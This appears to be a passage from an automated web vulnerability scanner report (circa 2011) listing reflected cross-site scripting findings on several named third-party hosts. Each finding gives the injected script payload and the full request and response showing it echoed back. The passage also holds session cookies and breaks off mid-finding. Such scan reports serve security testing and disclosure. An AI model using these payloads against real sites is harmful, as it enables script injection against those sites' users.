Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=640&height=360&flashID=myExperience760506419001&bgcolor=%23FFFFFF&playerID=756466704001&playerKey=AQ~~%2CAAAAAGVItvU~%2Cxxq25SD_mE9Rd7N-RZcmqKic844kbT39&isVid=true&isUI=true&dynamicStreaming=true&wmode=transparent&%40videoPlayer=760506419001&autoStart=&debuggerID=
Content-Length: 533
Origin: http://www.activenetwork.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qc637636194158e54e9df26b405d6e8a768c8cdf7
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Wed, 31 Aug 2011 17:57:57 GMT
Server:
Content-Length: 3496

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A.R-.@...eAQ~~,AAAAAGVItvU~,xxq25SD_mE9Rd7N-RZcmqKic844kbT39.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bf"6.. ..ivideoPlayer1af17<script>alert(1)</script>33d62cd3122..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

1.204. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd was submitted in the REST URL parameter 14. This input was echoed as c89cc<img src=a onerror=alert(1)>a91674af5dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:36 GMT
Expires: Sat, 03 Sep 2011 21:49:36 GMT
ObjectVersions: [Inst: req 2, db 2]; [Reg: req 21, db 21];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 5404

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23FFFFFF&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fserv
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/63b0a2eb-de86-438e-a586-0b38939f7284.png?21"}],"token":"b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img src=a onerror=alert(1)>a91674af5dd"});

1.205. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6044<a>0e177e272a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web01
Content-Length: 1190

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

1.206. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 97343<script>alert(1)</script>30c35374104 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26G47UIDG3DDCBB22A7G2DC864G2D41F5G2D960CG2D8BCAF2F5EEA0G26fbidG3DFQXQSI1dYd5G26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=197343<script>alert(1)</script>30c35374104&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:13 GMT
Etag: "3c0e33681f27b3bc7abb368ce23732a5b7f2abee"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/jx77nf", "id": "197343<script>alert(1)</script>30c35374104", "persist": "http://meme.ms/persist?key=DS7Bc1uIWWoDbZR8AdyVGg"}, 1);

1.207. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d18a5<script>alert(1)</script>d6a4d83a2ea was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26G47UIDG3DDCBB22A7G2DC864G2D41F5G2D960CG2D8BCAF2F5EEA0G26fbidG3DFQXQSI1dYd5G26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3Bd18a5<script>alert(1)</script>d6a4d83a2ea HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:16 GMT
Etag: "3b2ea8990f2f307eca7064c26158c0167d7704e3"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/jx77nf", "id": "1", "persist": "http://meme.ms/persist?key=DS7Bc1uIWWoDbZR8AdyVGg"}, 1);d18a5<script>alert(1)</script>d6a4d83a2ea

1.208. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 95b5d<script>alert(1)</script>82aca6beb88 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=FQXQSI1dYd5&parent_fbid=&referrer=http%3A%2F%2Fview.atdmt.com%2FCNT%2Fiview%2F286710721%2Fdirect%3Bwi.300%3Bhi.250%2F01%2F4315853561%3Fclick%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000805773%2Fmnum%3D0000949949%2Fcstr%3D48274349%3D_4e445c22%2C4315853561%2C805773%5E949949%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D48274349%2Foptn%3D64%3Ftrg%3D&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26GUID%3DDCBB22A7-C864-41F5-960C-8BCAF2F5EEA0%26fbid%3DFQXQSI1dYd5&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B95b5d<script>alert(1)</script>82aca6beb88 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:19 GMT
Etag: "c988cdb92e62f59ea9beeb036e903ee08fa90ebf"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3EFQXQSI1dYd5%3C%3E%3C%3Ehttp%253A%2F%2Fview.atdmt.com%2FCNT%2Fiview%2F286710721%2Fdirect%253Bwi.300%253Bhi.250%2F01%2F4315853561%253Fclick%253Dhttp%253A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%253D0000805773%2Fmnum%253D0000949949%2Fcstr%253D48274349%253D_4e445c22%252C4315853561%252C805773%255E949949%255E1183%255E0%252C1_%2Fxsxdata%253D%2524XSXDATA%2Fbnum%253D48274349%2Foptn%253D64%253Ftrg%253D%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526GUID%253DDCBB22A7-C864-41F5-960C-8BCAF2F5EEA0%2526fbid%253DFQXQSI1dYd5; Domain=.meteorsolutions.com; expires=Fri, 10 Aug 2012 22:51:19 GMT; Path=/
Set-Cookie: uid=c24daa55-d689-43c1-bfdf-08ee61c39dda; Domain=.meteorsolutions.com; expires=Fri, 10 Aug 2012 22:51:19 GMT; Path=/
Content-Length: 174
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "FQXQSI1dYd5", "uid": "c24daa55\\x2Dd689\\x2D43c1\\x2Dbfdf\\x2D08ee61c39dda"}, 0);95b5d<script>alert(1)</script>82aca6beb88

1.209. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.atomz.com
Path:   /autocomplete/sp10/04/3b/7b/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d15fa<script>alert(1)</script>7b7135fe1a9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete/sp10/04/3b/7b/?max_results=200&jsonp=true&callback=preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9&query=xs&d=jsonp1314795877616&_=1314795881111 HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?loc=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:05:18 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Content-Length: 136

preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9( [ "security issue sdk-22303: xss in express-install templates" ] )

1.210. http://content.bestbuyon.com/solr/select/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1f1bd<script>alert(1)</script>a2d5e472f3f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
otcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,"start":0,"docs":[
   {
    "nid":1841,
    "title":"Essential Tablet Accessories",
    "type":"dotcom_symlink",
    "created":"2011-07
...[SNIP]...

1.211. http://content.bestbuyon.com/solr/select/ [fl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the fl request parameter is copied into the HTML document as plain text between tags. The payload 3303d<script>alert(1)</script>b6529cfca94 was submitted in the fl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2482
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callba
...[SNIP]...

1.212. http://content.bestbuyon.com/solr/select/ [indent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the indent request parameter is copied into the HTML document as plain text between tags. The payload a4c14<script>alert(1)</script>d4c6728b788 was submitted in the indent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=ona4c14<script>alert(1)</script>d4c6728b788&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
mage,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"ona4c14<script>alert(1)</script>d4c6728b788",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,
...[SNIP]...

1.213. http://content.bestbuyon.com/solr/select/ [json.wrf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the json.wrf request parameter is copied into the HTML document as plain text between tags. The payload 7be8e<script>alert(1)</script>cadeab2043d was submitted in the json.wrf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:25:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2631
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess7be8e<script>
...[SNIP]...

1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7190a<script>alert(1)</script>c544176858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess&7190a<script>alert(1)</script>c544176858a=1 HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2599
